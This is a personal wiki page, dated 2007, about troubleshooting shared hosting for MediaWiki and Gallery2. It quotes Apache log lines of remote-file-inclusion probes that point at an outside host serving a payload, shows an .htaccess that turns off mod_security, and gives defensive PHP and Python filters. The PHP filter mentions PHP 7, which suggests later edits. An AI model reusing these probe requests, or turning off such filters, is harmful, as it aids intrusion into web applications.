Shared Hosting: Difference between revisions
Latest revision as of 07:57, 17 October 2007
I use Linksky to host this website, and they provide a reasonable Linux shared hosting solution. The problem with any shared hosting, and especially with PHP, is that you never know when your environment is going to change.
MediaWiki
In my latest "what is going to break today?", LinkSky deleted my .htaccess file out of my MediaWiki directory. I went to edit my OS X Tips tips, and I received this 406 error:
Not Acceptable An appropriate representation of the requested resource /wikimedia/index.php could not be found on this server.
How do I know it was deleted? Well, I had this problem before when the SecFilterEngine was first added. I fixed it by changing my .htaccess file. Fortunately, I have aged complete backups of my site. I just had to go to last week's backup to recover the file. Here's my .htaccess file:
<geshi lang="bash">
php_flag register_globals off
SecFilterEngine Off
</geshi>
I don't have to disable this everywhere, but in my wiki, I do tend to put lots of nasty commands like /bin/rm.
The interesting thing is I seem to be under attack from some spammer. I can see exactly when the change was made, because I start returning different error codes before and after.
<geshi lang="Apache Log">
124.125.17.35 - - [15/Oct/2007:03:07:23 -0500] "GET /wikimedia/index.php?title=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 301 13 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
124.125.17.35 - - [15/Oct/2007:03:07:24 -0500] "GET /wikimedia/index.php/Http://amyru.h18.ru/images/cs.txt%3F HTTP/1.1" 200 9607 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
71.107.243.197 - - [15/Oct/2007:04:26:29 -0500] "GET /gallery/main.php?g2_controller=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 968 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
71.107.243.197 - - [15/Oct/2007:04:26:42 -0500] "GET /gallery/main.php?g2_controller=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 968 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
24.77.215.65 - - [15/Oct/2007:05:16:34 -0500] "GET /wikimedia/index.php?title=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 406 278 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
24.77.215.65 - - [15/Oct/2007:05:16:38 -0500] "GET /wikimedia/index.php?title=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 406 278 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)"
</geshi>
I can see the attack is also going against my gallery installation. It would appear they are sending something else other than what shows up in the logs.
I added this to my mediawiki/LocalSettings.php and gallery/config.php files.
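<geshi lang="php">
// http and https should not be used in any query string.
// stripos() replaces eregi(), which was removed in PHP 7; matching 'http' also covers 'https'.
if (stripos($_SERVER['QUERY_STRING'] ?? '', 'http') !== false) {
    // Send the client back to the site root and stop processing the request.
    header('Location: http://' . $_SERVER['SERVER_NAME']);
    exit;
}
</geshi>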
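The filter above looks only at `$_SERVER['QUERY_STRING']`, while the second logged request carries the URL in the path after `index.php/`. As an added example (not the author's code), this Python scan flags access-log lines with an absolute URL in either place and tallies the status codes returned, which is how the before/after change shows up; the sample lines, addresses and the `files.example` host are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote

# Constructed sample in Apache combined log format (documentation IPs, placeholder host).
SAMPLE_LOG = """\
192.0.2.10 - - [15/Oct/2007:03:07:23 -0500] "GET /wikimedia/index.php?title=http://files.example/cs.txt? HTTP/1.1" 301 13 "-" "Wget/1.1"
192.0.2.10 - - [15/Oct/2007:03:07:24 -0500] "GET /wikimedia/index.php/Http://files.example/cs.txt%3F HTTP/1.1" 200 9607 "-" "Wget/1.1"
198.51.100.7 - - [15/Oct/2007:04:26:29 -0500] "GET /gallery/main.php?g2_controller=http://files.example/cs.txt? HTTP/1.1" 200 968 "-" "Wget/1.1"
203.0.113.5 - - [15/Oct/2007:05:16:34 -0500] "GET /wikimedia/index.php?title=http://files.example/cs.txt? HTTP/1.1" 406 278 "-" "Wget/1.1"
203.0.113.9 - - [15/Oct/2007:06:00:00 -0500] "GET /wikimedia/index.php?title=Shared_Hosting HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
URL_RE = re.compile(r'(?:https?|ftp)://', re.IGNORECASE)


def url_location(target):
    """Return 'query:<param>' or 'path' when the request target embeds an absolute URL."""
    path, _, query = target.partition('?')
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl percent-decodes; a value that *is* a URL is the inclusion-probe shape.
        # Legitimate redirect-style parameters match too, so review hits before blocking.
        if URL_RE.match(value.strip()):
            return 'query:' + name
    if URL_RE.search(unquote(path)):
        return 'path'  # never visible to a QUERY_STRING-only check
    return None


def scan(log_text):
    """Yield-style list of (timestamp, client, status, location) for suspicious requests."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        client, when, _method, target, status = m.groups()
        where = url_location(target)
        if where:
            hits.append((when, client, int(status), where))
    return hits


def status_by_location(hits):
    """Count (location, status) pairs so a change in server behaviour stands out."""
    return Counter((where, status) for _, _, status, where in hits)


if __name__ == "__main__":
    for (where, status), n in sorted(status_by_location(scan(SAMPLE_LOG)).items()):
        print(f"{where:22} {status} x{n}")
```
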
Gallery2
The way I always find out is when something that was working suddenly stops. The case today is my image block on this site's home page. Originally, the block was created with this code:
When it stopped working, I changed it to this:
<geshi lang="php">error_reporting(E_ALL); readfile('http://www.theeggeadventure.com/gallery/main.php?g2_view=imageblock.External&g2_blocks=recentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage&g2_show=none&g2_maxSize=50'); </geshi>
That did not produce any error messages, so I tried this suggestion:
<geshi lang="php">
$ch = curl_init();
$timeout = 5; // set to zero for no timeout
curl_setopt($ch, CURLOPT_URL, 'http://www.theeggeadventure.com/gallery/main.php?g2_view=imageblock.External&g2_blocks=recentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage%7CrecentImage&g2_show=none&g2_maxSize=50');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$file_contents = curl_exec($ch);
curl_close($ch);
echo $file_contents;
</geshi>
Today, this is working, but at some point the web host may disable curl, and then I'll have to find another solution. If I had a more important site, I'd pay for virtual hosting or dedicated hosting. If I had more time and bandwidth, I'd run the server at my home.